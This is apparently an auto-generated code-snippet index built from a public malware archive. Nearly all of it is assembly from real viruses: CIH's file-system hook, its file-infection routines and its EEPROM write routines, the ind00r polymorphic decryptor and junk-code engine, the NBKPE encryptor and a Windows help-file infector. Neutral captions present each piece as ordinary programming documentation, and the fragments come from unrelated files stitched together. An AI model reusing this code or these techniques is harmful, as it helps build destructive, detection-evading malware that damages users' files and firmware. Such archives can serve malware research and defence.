### IFSMgr_InstallFileSystemApiHook Entry Point Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt Handles the installation of the File System API hook. It saves the original hook and sets up the new hook. ```assembly InstallFileSystemApiHook: push ebx call @4 ; @4: ; pop ebx ; mov ebx, offset FileSystemApiHook add ebx, FileSystemApiHook-@4 ; push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address pop eax pop ebx ret ``` -------------------------------- ### Install File System API Hook Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt Installs a custom File System API hook by calling IFSMgr_InstallFileSystemApiHook. It saves the original hook address and replaces it with the virus's hook. ```assembly InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $ dd 00400067h ; Use EAX, ECX, EDX, and flags mov dr0, eax ; Save OldFileSystemApiHook Address pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] mov OldInstallFileSystemApiHook-@3[eax], edx ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax cli jmp ExitRing0Init ``` -------------------------------- ### Get Parameter Procedure Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt A placeholder procedure for getting parameters, currently does nothing. ```assembly iGetPar proc ret iGetPar endp ``` -------------------------------- ### IFSMgr_FileSystemHook Entry Point Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt The entry point for the FileSystemApiHook. It saves registers, determines the virus game data start address, and checks for 'OnBusy' and 'OpenFile' conditions. ```assembly FileSystemApiHook: @3 = FileSystemApiHook pushad call @5 ; @5: ; pop esi ; mov esi, offset VirusGameDataStartAddress add esi, VirusGameDataStartAddress-@5 ; ************************************* ; * Is OnBusy !? * ; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) jnz pIFSFunc ; goto pIFSFunc ; ************************************* ; * Is OpenFile !? * ; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] cmp dword ptr [ebx], 00000024h jne prevhook ; ************************************* ; * Enable OnBusy * ; ************************************* ``` -------------------------------- ### EDI Offset Initialization Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt Sets the EDI register to point to the start of the virus code and prepares it for subsequent operations. It uses specific byte codes for initialization. ```assembly ;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* ; EDI_OFFSET * ;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* ; edi_ofs proc ; push eax ; mov al,0BFH ; stosb ; mov [ebp+_off2],edi ; mov edi,offset virus xor eax,eax ; stosd ; pop eax ; ret ; edi_ofs endp ; ``` -------------------------------- ### Get Random Encrypted Data (Method 1) Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Retrieves a direct address to random encrypted data. Uses a call to 'rnd32r' for randomness. ```assembly dec eax push eax call rnd32r ; from junk memory add eax, [ebp.JunkSpRVA-idelta] ; add start rva xchg eax, esi mov cx, MOD_DIRECT ; return a direct address ret ``` -------------------------------- ### Get Encrypted Data (Method 4) Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Retrieves encrypted data with a scaling factor applied to the address. Uses a random number to determine the scaling factor (1, 2, or 4). ```assembly mov esi, [ebp.DecryptRVA-idelta] push 03h ; scaling factor 1, 2 or 4 call rnd32r mov ecx, eax push edx xor edx, edx inc edx shl edx, cl sub esi, edx pop edx shl eax, 03h xor al, [ebp.creg-idelta] mov ch, al mov cl, MOD_DIRECT ret ``` -------------------------------- ### Get Random Encrypted Data (Method 3) Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Retrieves a direct address to encrypted data using a calculated offset. The offset is derived from 'CryptSize' and a random number. ```assembly mov eax, [ebp.CryptSize-idelta] shl eax, 02h dec eax dec eax dec eax push eax call rnd32r add eax, [ebp.DecryptRVA-idelta] xchg eax, esi mov cx, MOD_DIRECT ret ``` -------------------------------- ### Get File Attributes using IFSMgr_Ring0_FileIO Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt Calls the IFSMgr_Ring0_FileIO VXD service to retrieve the attributes of a file. It uses AX=4300h for this operation and checks for carry flag to indicate errors. ```assembly ; ************************************* ; * Get Attributes of the File * ; ************************************* mov ax, 4300h int 20h ; VXDCall IFSMgr_Ring0_FileIO IFSMgr_Ring0_FileIO = $ dd 00400032h jc DisableOnBusy ``` -------------------------------- ### Junk Block Generation Entry Point Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt This procedure is the main entry point for generating a single junk block. It selects a junk block generation method randomly. ```assembly ; main procedure: generate 1 junk block iBlockJunk proc mov bl, 08h iBlockJunkAR: ; avoid register in ebx test byte ptr [ebp.nojunk-idelta], 0FFh jz bj_sueder ret bj_sueder: pushad push BJ_BLOCKCNT ; choose between multiple methods call rnd32r mov edx, [ebp.bj_blockz-idelta+4*eax] ; get address of add edx, ebp ; method procedure & relocate bj_nxtr: call iGetJunkReg ; get a junk reg cmp al, bl ; test if we shouldn't touch it je bj_nxtr ; yes, get another junk reg xchg ebx, eax ; junk reg in EAX call edx ; execute method mov [esp], edi popad ret ``` -------------------------------- ### Get IFSMgr_Ring0_FileIO Address Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt Retrieves the address of the IFSMgr_Ring0_FileIO function. This address is likely used for subsequent calls to this function. ```assembly ; ************************************* ; * Get IFSMgr_Ring0_FileIO Address * ; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ``` -------------------------------- ### Generate Junk Register and Clear Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Generates a random register, clears it, and stores it in ECX. This is part of the exception handling setup. ```Assembly isj_npd0: call rnd32 and al, REG_EDI cmp al, REG_ESP je isj_npd0 mov ebx, eax call gClearReg xchg eax, ecx ``` -------------------------------- ### HLP File - Locate and Prepare System Directory Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt Assembly code to locate the system directory offset, swap it with the file size, and prepare for modification. ```assembly foundSystemDir: ; as i only infect non-indexed hlp files, i'm sure the ; data that follows the |SYSTEM zstring is the offset of ; the directory. 1st skip the zstring add edi,8 ; now goto to the directory (offset from hlp header) ; and set the new system directory at the end of file mov esi,dword ptr [fileSize+ebp] xchg esi, dword ptr [edi] mov edi,esi add edi,eax ; save begin of this file mov edx,edi add edi,size HLPFILEHEADER ``` -------------------------------- ### Indirect Get Memory Call Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Performs an indirect call to one of the 'gm_meth' procedures based on a random index. Used for writing memory. ```assembly iGetWrMem proc push eax push GM_METHCNT3 - 1 call rnd32r mov eax, [ebp.gm_methods-idelta+4+4*eax] add eax, ebp call eax pop eax ret iGetWrMem endp ``` -------------------------------- ### Procedure Entry Point Generation (Win32 Assembly) Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Generates the entry point for a procedure, choosing between 'ENTER' or 'PUSH EBP / MOV EBP, ESP' based on procedure parameters and local variable presence. Includes junk code insertion. ```assembly mov dl, [ebp.ProcParameters-idelta+ebx] test dl, dl ; if no parameter, jz gp_np_entry ; generate no entry ; if procedure has parameters we need to set up EBP ; choose between two (similar) entrys: ; ENTER 0000h,00h ; or ; PUSH EBP ; MOV EBP, ESP test dh, 01h jz gp_psh_entry xor eax, eax ; no local variables mov al, PROC_ENTER ; opcode for enter stosd ; store instruction jmp gp_np_entry gp_psh_entry: mov eax, PUSH_REG or REG_EBP or (100h * MOV_EBP_ESP) stosd dec edi ; wrote 3 bytes gp_np_entry: push ebx call iProcJunk pop ebx cmp ebx, JUNK_PROC jnb gp_junk_proc mov esi, [ebp.Generatorz-idelta+ebx*4] add esi, ebp push edx call esi ; call di generator pop edx gp_junk_proc: call iProcJunk ; make some junk mov eax, edx xor ah, ah shl eax, 08h xor 02h ; shift left one byte + * 4 xor al, PROC_RETP ; generate ret (with params) test ah, ah ; do we have parameters? jz gp_no_par mov byte ptr [edi], POP_REG or REG_EBP test dh, 01h jz gp_psh_exit xor byte ptr [edi], PROC_LEAVE xor (POP_REG or REG_EBP) gp_psh_exit: inc edi ; write pop ebp/leave stosd ; store RET opcode (C2h) dec edi ; only store 3 bytes jmp gp_par gp_no_par: inc eax stosb ; store RET opcode (C3h) gp_par: call WriteJunk pop ebx inc ebx ; increment count pop ecx loop gp_loop ret iGenProcs endp ``` -------------------------------- ### Enable EEPROM Write Routine (Assembly) Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt This routine prepares the EEPROM for writing operations by setting specific byte values. It's a short sequence of memory and register manipulations. ```assembly ; *************************** ; * Enable EEPROM to Write * ; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ``` -------------------------------- ### iInit Procedure for Poly Engine Initialization Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Initializes the ind00r polymorphic engine. It calculates delta offsets, sets up the random seed, stores initial parameters, and prepares registers for use. ```assembly ; main procedure: init iInit proc ; first of all, calculate new delta offset mov ebp, [esp] add ebp, idelta - offset ind00r_delta ; calculate delta ; offset ; now init random seed push dword ptr [ebp.RandomConst-idelta] pop dword ptr [ebp.RandomSeed-idelta] push edi ; push destination index lea edi, [ebp.InitValues-idelta] ; table with init values ; let's store parameterz stosd ; store size of junk space xchg eax, edx stosd ; store address of junk space xchg eax, ebx stosd ; store decrypt rva xchg eax, ecx stosd ; size of code xchg eax, esi stosd ; address of code ; mix the registers lea esi, [ebp.preg-idelta] push USED_REGS call MixBytes ; get number of junk procedures (1 - 5) push JUNK_PROCS ; 0 - 3 call rnd32r add al, MIN_PROCS mov [ebp.ProcCount-idelta], al ; number of procedures ; put the procedures in random order lea esi, [ebp.ProcedureOrder-idelta] push eax call MixBytes ``` -------------------------------- ### Get Current Encrypted Dword (Method 5) Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Retrieves the current encrypted dword using a byte from '[preg]' as an offset. Returns a direct address. ```assembly movsx cx, byte ptr [ebp.preg-idelta] ; use [preg] without xor esi, esi ; displacement ret ``` -------------------------------- ### Get Random Junk Register Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Returns a random 8-bit value from the 'junkreg1' array, zero-extended to 32 bits. Used for generating junk register values. ```assembly iGetJunkReg proc push 03h call rnd32r movzx eax, byte ptr [ebp.junkreg1-idelta+eax] ret iGetJunkReg endp ``` -------------------------------- ### Ring3 Virus Game Initial Program Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt Assembly code for the initial entry point of a Ring3 virus. It sets up the stack frame and modifies structured exception handling. ```assembly VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; ***************************************** ; * Ring3 Virus Game Initial Program * ; ***************************************** MyVirusStart: push ebp ; ************************************ ; * Let's Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0 @0: pop ebx ``` -------------------------------- ### Push Method Table Initialization Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Defines a table of offsets for various 'pp_meth' procedures. Used for indirect calls to push junk data. ```assembly pp_methods equ $ dd offset pp_meth1 - idelta dd offset pp_meth2 - idelta dd offset pp_meth3 - idelta dd offset pp_meth4 - idelta dd offset pp_meth4 - idelta PP_METHCNT equ 05h ``` -------------------------------- ### Open File using IFSMgr_Ring0_FileIO Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt Opens a file using the IFSMgr_Ring0_FileIO VXD call. It sets specific registers (EAX, EDX, EBX) to control the open operation and returns a file handle in EBX. ```assembly ; ************************************* ; * Open File * ; ************************************* OpenFile: xor eax, eax mov ah, 0d5h xor ecx, ecx xor edx, edx inc edx mov ebx, edx inc ebx call edi ; VXDCall IFSMgr_Ring0_FileIO xchg ebx, eax ; mov ebx, FileHandle ``` -------------------------------- ### Store MOD/RM Byte and Exit Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt This snippet exchanges EAX and EBX to get the MOD/RM byte, stores it using STOSB, and then prepares for exit by setting ESP and returning. ```assembly xchg eax, ebx ; MOD/RM byte stosb ; store gcr_exit: mov [esp], edi popad ret ``` -------------------------------- ### Main Junk Generation Procedure Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt This procedure orchestrates the generation of multiple junk blocks. It uses a random counter to determine how many junk blocks to create. ```assembly iProcJunk proc push ecx ; preserve counter push 03h ; get random number between 0 and 4 call rnd32r inc eax ; add 1 (1 - 3) xchg eax, ecx ; load into counter call iBlockJunk ; generate junk blocks loop $ - 05h pop ecx ; restore counter ret iProcJunk endp ``` -------------------------------- ### FPU Instruction Execution and Operand Creation Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt This snippet demonstrates calling FPU instructions and creating operands. It involves randomizing FPU operations and storing results. ```assembly call rnd32 and al, FPU_WORD_LDST or al, FPU_INT_LDST mov bl, FPU_LOAD stosb call ciCreateOperand ``` ```assembly call iGetWrMem call rnd32 and al, FPU_WORD_LDST xor FPU_INT_LDST xor al, FPU_INT_LDST mov bl, FPU_STORE stosb call ciCreateOperand call iRndRegJ ``` -------------------------------- ### FPU Method gf_meth3 Implementation Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Implements FPU method 3, involving loading LN2, square root, dword operation, and multiplication. Includes junk block insertion. ```assembly gf_meth3: mov ax, FPU_LDLN2 stosw call iBlockJunk mov ax, FPU_SQRT stosw mov al, FPU_QWORD_OP stosb mov bl, FPU_MUL mov cl, REG_ST1 or MOD_REG call ciCreateOperand mov ax, FPU_DWORD_LDST or (100h * (MOD_REG xor 09h)) stosw ret ``` -------------------------------- ### Get Random Memory Operand (Assembly) Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Retrieves a random memory operand, either a parameter or junk memory. It dynamically selects a method based on the current procedure and loop status. ```assembly iGetMemory proc push eax gm_rep: xor eax, eax mov al, GM_METHCNT2 cmp byte ptr [ebp.CurrentProc-idelta], DECRYPT_DATA jb gm_push inc eax inc eax gm_push: sub al, [ebp.InLoop-idelta] push eax call rnd32r add al, [ebp.InLoop-idelta] mov eax, [ebp.gm_methods-idelta+4*eax] add eax, ebp call eax pop eax ret ; get random parameter gm_meth1: movzx eax, byte ptr [ebp.CurrentProc-idelta] mov al, [ebp.ProcParameters-idelta+eax] ; parameter count test eax, eax jz gm_m1_ebp ; if no parameter, don't use this method push eax call rnd32r ; choose random parameter shl eax, 02h ; scale to dword add al, 08h ; first dword is return address mov esi, eax ; the displacement mov cx, REG_EBP ; relative to EBP ret gm_m1_ebp: mov cl, REG_EBP xor MOD_REG ret ; get random junk mem gm_meth2: mov eax, [ebp.JunkSpSize-idelta] ; access a random dword shl eax, 02h dec eax dec eax ``` -------------------------------- ### HLP File - Copy System Directory and Macro Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt Assembly code to copy the original system directory and the new macro data into the allocated buffer. ```assembly ; copy system directory plus our macro to the buffer ; 1st old system mov edi,dword ptr [mHnd+ebp] mov esi,edx mov ecx,dword ptr [edx] rep movsb ; begin 'our macro' generation ``` -------------------------------- ### EEPROM I/O Routine (Assembly) Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt Handles input and output operations for the EEPROM. It uses port I/O instructions to communicate with the EEPROM device. ```assembly ; *************************** ; * IO for EEPROM * ; *************************** IOForEEPROM: @10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ``` -------------------------------- ### FPU Method gf_meth1 Implementation Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Implements FPU method 1, involving loading PI, performing a word operation, and multiplication. Includes junk block insertion. ```assembly gf_meth1: call rnd32 and al, 01h jz gf_meth11 mov ax, FPU_LDPI stosw call iBlockJunk mov al, FPU_WORD_OP stosb mov bl, FPU_MULP gf_meth1e: mov cl, REG_ST1 or MOD_REG jmp ciCreateOperand gf_meth11: mov ax, FPU_LDLG2 stosw call iBlockJunk mov al, FPU_WORD_OP stosb mov bl, FPU_DIVP jmp gf_meth1e ``` -------------------------------- ### Push Junk Procedure Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Pushes junk data onto the stack by calling random methods from 'pp_methods'. ```assembly iPushJunk proc pushad push PP_METHCNT ; random method to push call rnd32r ; a parameter mov eax, [ebp.pp_methods-idelta+4*eax] add eax, ebp call eax ; call da method mov [esp], edi popad ret ``` -------------------------------- ### Method 1: MOV REG, IMM32 Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Implements the 'MOV REG, IMM32' instruction. It takes the register from EAX and the immediate value from EDX, then stores them. ```assembly ; method 1: mov reg, imm glr_meth1: xchg eax, ebx ; get register xor al, MOV_REG_IMM32 ; add opcode stosb ; store opcode xchg eax, edx ; get immediate stosd ; store immediate ret ``` -------------------------------- ### RVA Manipulation and SEH Initialization Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt This snippet demonstrates how to manipulate Relative Virtual Address (RVA) and initialize Structured Exception Handling (SEH) related variables. ```Assembly mov ebx,[ebp+_RVA] ; add ebx,edx ; add ebx,eax ; add ebx,3 ; ; mov eax,[ebp+ofs off1] ; mov [eax],ebx ; ; mov dr0,edi ; popad ; mov edi,dr0 ; ret ; ; ini_SEH dd 0 ; ;wahoo dd 0 ; ;siz dd 0 ; off1 dd 0 ; off6 dd 0 ; all_ini dd 0 ; xor_reg db 0 ; _RVA dd 0 ; len dd 0 ; ofsvir dd 0 ; ; SEH endp ; ``` -------------------------------- ### FPU Method gf_meth2 Implementation Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Implements FPU method 2, involving loading L2T, performing a dword operation, and multiplication. Includes junk block insertion. ```assembly gf_meth2: mov ax, FPU_LDL2T stosw call iBlockJunk mov al, FPU_DWORD_OP stosb mov bl, FPU_MUL mov cl, REG_ST1 or MOD_REG jmp ciCreateOperand ``` -------------------------------- ### Assembly: Data Manipulation with STOSB and STOSD Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt Demonstrates the use of STOSB and STOSD instructions for storing bytes and doublewords, often used for data initialization or copying. ```Assembly ;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+ mov al,64H stosb mov bl,byte ptr [ebp+xor_reg] or bl,bl jz @@9 ; no regs mov al,89H stosb mov al,cl ; Get used reg sub al,10H ; ... jmp @@10 @@9: mov eax,00268967H ; 6789260000 stosd xor al,al @@10: stosb call chg_garble ;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+ ``` -------------------------------- ### Exception Handling for Non-Win9x Systems Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt Assembly code to handle exceptions on systems that are not Windows 9x, by setting up the stack pointer. ```assembly exception: xor esi,esi ; we are not under mov eax,dword ptr fs:[esi] ; win9x... a pitty mov esp,dword ptr [eax] jmp quitSEH ``` -------------------------------- ### Code Encryption/Decryption Initialization Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt Initializes the encryption process by setting up offsets and lengths for the code to be encrypted. It uses helper procedures to manipulate registers and memory. ```assembly ;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* ; CRYPT CODE * ;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* CRYPT proc ; 1) mov edi, 'CODE_OFFSET_RUNTIME' ; 2) mov ecx, 'VIRUS_LENGHT' ; 3) mov /eax/ebx/edx/, DWORD PTR [edi] ; 4) xor /eax/ebx/edx/, KEY ; 5) add/sub /eax/ebx/edx/, BYTE mov [ebp+_off1],edi ; PROC init call edi_ofs mov ecx,dword ptr [ebp+len] call len_ecx call edi2eax push edi call xor_eax call eax2edi call add_edi pop ebx sub ebx,2 ; Back to instruction call do_loop mov eax,edi sub eax,[ebp+all_ini] ; EAX = decryptor size add eax,[ebp+_RVA] add eax,2 mov esi,[ebp+_off2] mov [esi],eax push edi ; Save end of mov ecx,dword ptr [ebp+len] mov esi,dword ptr [ebp+ofsvir]; rep movsd ; copy it pop edi push edi sub edi,[ebp+_off1] mov eax,edi mov ebx,[ebp+_off3] mov esi,ebx lea edi,[ebp+ofs buff] mov ecx,eax mov edx,30 sub edx,ecx rep movsb mov al,90H mov ecx,edx sub ecx,2 rep stosb pop edi buff db 30 dup (90H) db 6 dup (0C3H) ``` -------------------------------- ### Assembly: Data Initialization and Subtraction Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt Code that initializes registers and performs subtraction operations, likely for calculating offsets or sizes. ```Assembly ;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+ ; ;mov [ebp+ofs wahoo],edi ; ; mov eax,[ebp+ini_SEH] ; sub eax,[ebp+all_ini] ; mov edx,eax ; ; mov eax,[ebp+off6] ; sub eax,[ebp+off1] ; ; ``` -------------------------------- ### BBM Window Management Functions Source: https://github.com/vxunderground/malwaresourcecode/blob/main/LegacyWindows/Win2k/Constructor.Script.IBBM.a.html Handles opening a new window for displaying generated code and writing content to either the main document or the display window. ```javascript function WinOpen(something) { msg=open(something,"DisplayWindow", "toolbar=no,directories=no,menubar=no,scrollbars=yes,resizable=yes"); codewindow=true; return msg; } function write(stuff) { if (codewindow) msg.document.writeln(stuff); else document.writeln(stuff); } function wr(stuff) { if (codewindow) msg.document.write(stuff); else document.write(stuff); } ``` -------------------------------- ### Generate Opcode and Store Byte Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt This snippet generates an opcode by combining AL and ECX, then stores it using STOSB. It's part of the random direction and opcode creation logic. ```assembly test al, 01h jz gcr_not_sub mov cl, MATH_XOR or OPSIZE_32 gcr_not_sub: and al, REG_MEM ; random direction or eax, ecx ; create opcode stosb ; store opcode ``` -------------------------------- ### Main function for Win32 Disassembler Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Libs/Win32/Disassembler/VirTool.Win32.Disassembler.4553_LDE.txt This assembly code sets up the main execution flow: opening a file, allocating memory for data, reading the file content, and calling the disassembler function. ```assembly main: push %ebp mov %esp,%ebp push $2 push $file call open mov %eax,fd push $424 call malloc mov %eax,data push $424 push data push fd call read mov data,%eax add $0x74,%eax # entry point, first instruction - xor %eax,%eax push %eax call l_disasm push %eax push $l call printf call exit l:.string"Lenght of instruction: %d\n" file: .string "test" .comm fd,4,4 .comm data,424,4 ``` -------------------------------- ### Method Table Initialization Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Defines a table of offsets for various 'gm_meth' procedures. Used for indirect calls. ```assembly gm_methods equ $ dd offset gm_meth1 - idelta dd offset gm_meth2 - idelta GM_METHCNT3 equ 02h dd offset gm_meth3 - idelta GM_METHCNT2 equ 03h dd offset gm_meth4 - idelta dd offset gm_meth5 - idelta GM_METHCNT1 equ 05h ``` -------------------------------- ### HLP File - Search for System Directory Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt Assembly code to scan for the '|SYSTEM' directory within the HLP file's b-tree structure. ```assembly ; scan for |SYSTEM directory. ; search 512 bytes into the b-tree and ignore the internal ; structures of b-tree. add edi,size BTREEHEADER mov ecx,200h searchSystemDir: cmp dword ptr [edi],'SYS|' je foundSystemDir inc edi loop searchSystemDir jmp notNiceHlp ``` -------------------------------- ### Virus Data and Generator Addresses Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Defines initialization data for the virus, including a signature string and lists of addresses for instruction and junk code generators. ```assembly ; initialized data db '[ind00r] polymorphic engine by slurp', 0 ; decryptor instructions generator addresses (relative to idelta) Generatorz dd offset iProcLdPtr - idelta ; load pointer dd offset iProcLdCnt - idelta ; load counter dd offset iProcLdKey - idelta ; load key dd offset iProcDecData - idelta ; decrypt data dd offset iProcIncKey - idelta ; increment key dd offset iProcIncPtr - idelta ; increment pointer dd offset iProcDecCnt - idelta ; decrement counter dd offset iProcFPUFool - idelta ; neat stuff :O ; junk instruction generator addresses (relative to idelta) JunkGen dd offset iMemJunk - idelta dd offset iRegJunk - idelta JUNKGEN_CNT equ 02h ``` -------------------------------- ### Method 3: MOV REG, IMM32 then Arithmetic Operation Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt First moves an immediate value to a register, then performs an arithmetic operation (ADD/SUB/XOR) with another immediate value. Stores opcode and immediate. ```assembly ; method 3: mov reg, rnd; ; sub/add/xor reg, imm add/sub/xor rnd glr_meth3: mov al, MOV_REG_IMM32 ; mov reg, imm32 opcode xor eax, ebx ; add register stosb ; store it call rnd32 ; get a random dword stosd ; store it ``` -------------------------------- ### HLP File - Allocate Buffer for Macro Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt Assembly code to allocate a temporary buffer using VirtualAlloc for storing the modified macro data. ```assembly ; get size of the directory mov esi,dword ptr [edx] ; the max size of the macro, just an aproximation add esi,((vSize/2)*10)+1000h ; alloc a temporary buffer pushad push 00000004h push 00001000h push esi push 0 call dword ptr [_VirtualAlloc+ebp] or eax,eax jne bufferOk popad jmp notNiceHlp bufferOk: mov dword ptr [mHnd+ebp],eax popad ``` -------------------------------- ### HLP File - System Directory Version Check Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt Assembly code to check the version of the HLP system directory and skip the title if the version is 16 or less. ```assembly ; check is a system directory cmp word ptr [edi],036ch jne notNiceHlp ; check version mov esi,edi add esi,0ch cmp word ptr [edi+2],10h ja noTitleHere ; if has title, skip it (version <= 16) skipTitle: inc esi cmp byte ptr [esi-1],0 je skipTitle noTitleHere: ``` -------------------------------- ### ind00r Main Procedure Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt The main procedure for the ind00r polymorphic engine. It initializes the engine, generates procedures and junk code, encrypts the target code, and prepares for execution. ```assembly ; main procedure: ind00r ; parameters: ; ; EAX = size of junk space (in dwords) ; EDX = address of junk space ; �������Ŀ this is the RVA of an empty space in (un- ; initialized data or padding space). the junk ; instructions will write to this area ; ������������������������������������������_ ; ; EBX = address of code to decrypt ; �������Ŀ this is the RVA where the encrypted ; code will be stored in the infected file. ; ������������������������������������������_ ; ; ECX = size of code to encrypt (in dwords) ; ESI � code to encrypt ; EDI � area >= 2kb to store the decryptor ; ; returns: the registers aren't changed except ECX that contains ; the size of the poly decryptor! ; ; NOTE: '� ' is equal to 'points to' ; ; the decryptor constists of junk procedures, decryptor procedures, main ; loop calling the procedures and finally jump to the start address to the ; decrypted code. ind00r proc pushad ; preserve all registers call iInit ; initialize poly engine ind00r_delta: mov al, JMP_LONG ; write jump to main loop stosb ; store opcode push edi ; to reloc jmp l8er stosd ; store relative offset call WriteJunk ; write some junk bytez call iGenProcs ; generate procedures push edi ; here we want to jump call RelLongJmp ; reloc jump to main loop or byte ptr [ebp.nojunk-idelta], 0FFh call iGenLoop ; generate main loop call iSEHJump sub edi, [esp.PUSHAD_EDI] ; calculate decryptor size mov [esp.PUSHAD_ECX], edi ; ECX = size call iEncrypt ; encrypt code! popad ; restore all registers ret ; return ind00r endp ``` 